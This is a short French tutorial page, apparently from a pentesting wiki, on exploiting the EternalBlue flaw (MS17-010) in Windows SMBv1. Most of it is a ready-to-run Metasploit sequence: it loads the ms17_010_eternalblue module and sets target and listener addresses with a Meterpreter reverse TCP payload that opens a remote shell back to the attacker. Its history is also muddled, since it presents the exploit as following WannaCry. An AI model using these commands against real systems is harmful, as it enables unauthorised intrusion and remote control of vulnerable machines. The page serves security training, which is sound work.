Skip to main content

[Exploitation/Windows] Eternal Blue

Introduction

L'exploit Eternal Blue a été développé par la NSA en 2017. Il fait suite à l'exploitation de la vulnérabilité MS17-010 lors de la campagne de Ransomware Wannacry.

La faille est présente dans la v1 du protcole SMB et permet notamment une RCE.

image.png

Exploitation avec Metasploit

  • Tout d'abord lancez la console Metasploit :
msfconsole
  • Sélectionnez l'exploit :
use exploit/windows/smb/ms17_010_eternalblue
  • Définissez les options :
set rhosts <TARGET_IP>
set lhost <LOCAL_IP>
set lport <PORT>
set payload windows/x64/meterpreter/reverse_tcp
  • Puis lancez l'exploit :
run